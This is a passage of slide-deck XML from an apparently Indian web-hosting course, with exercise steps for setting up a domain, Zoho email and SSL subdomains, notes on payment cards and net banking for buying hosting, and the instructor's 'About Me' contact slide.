              <a:buSzPts val="1625"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email Server</a:t>
            </a:r>
            <a:endParaRPr sz="1625">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-331787" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1625"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1625">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-331787" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1625"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Format the server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hosting provider control panel</a:t>
            </a:r>
            <a:endParaRPr sz="1625">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-331787" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1625"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setup a basic HTML template on your domain i.e anildollor.in. Make it up and running.</a:t>
            </a:r>
            <a:endParaRPr sz="1625">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-331787" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1625"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create your professional email like info@anildollor.in,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>career@anildollor.in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> using ZoHO</a:t>
            </a:r>
            <a:endParaRPr sz="1625">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-331787" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1625"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> application with ssl on subdomains</a:t>
            </a:r>
            <a:endParaRPr sz="1625">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1975" name="Google Shape;1975;p321"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="538475" y="0"/>
            <a:ext cx="8229600" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1976" name="Google Shape;1976;p321"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="50000" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="907825" y="2531525"/>
            <a:ext cx="841750" cy="841750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1977" name="Google Shape;1977;p321"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="50000" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587100" y="3825900"/>
            <a:ext cx="841750" cy="841750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1978" name="Google Shape;1978;p321"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="50000" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7525950" y="933025"/>
            <a:ext cx="841750" cy="841750"/>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322"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040875" y="1629425"/>
            <a:ext cx="7344000" cy="29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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RuPay Debit/Credit Cards are not acceptable by many companies</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1984" name="Google Shape;1984;p322"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="49997" r="3034" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3720550" y="300725"/>
            <a:ext cx="1610050" cy="1713950"/>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323"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040875" y="951675"/>
            <a:ext cx="7344000" cy="298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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debit/Credit Card must have domestic and international transaction enabled</a:t>
            </a:r>
            <a:endParaRPr sz="48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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1335650" y="121775"/>
            <a:ext cx="47865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2800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>About Me</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Google Shape;113;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="3774" r="6580" t="2903"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6678825" y="169175"/>
            <a:ext cx="2311800" cy="2475925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321725" y="829800"/>
            <a:ext cx="6235500" cy="43137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rgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CTO @ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ocean Telecom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> UK</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOLLOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> INFOTECH</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YouTuber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OKLABS Channel</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Professor @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gyanodaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> College, Neemuch,MP,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INDIA</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>dollorinfotech@gmail.com</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2050" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.linkedin.com/in/anildalar</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/anildalar</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://t.me/oklabs</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5395200" y="2829700"/>
            <a:ext cx="3595500" cy="18225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sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ANIL DOLLOR,</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>M.Tech, M.Sc.(CS)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Sr. Software Engineer,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>DOLLORINFOTECH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>, INDIA</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>+91-7999452711(WhatsApp)</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Robo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54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1700" l="14309" r="26658" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782775" y="193625"/>
            <a:ext cx="5078251" cy="4756226"/>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324"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="761425"/>
            <a:ext cx="8520600" cy="34164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1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All Students must have net banking of your bank so that you can enable or disable the domestic and international transaction whenever required</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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325"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="379475"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of Server</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2000" name="Google Shape;2000;p325"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491625" y="1234300"/>
            <a:ext cx="5985900" cy="3131400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-501650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
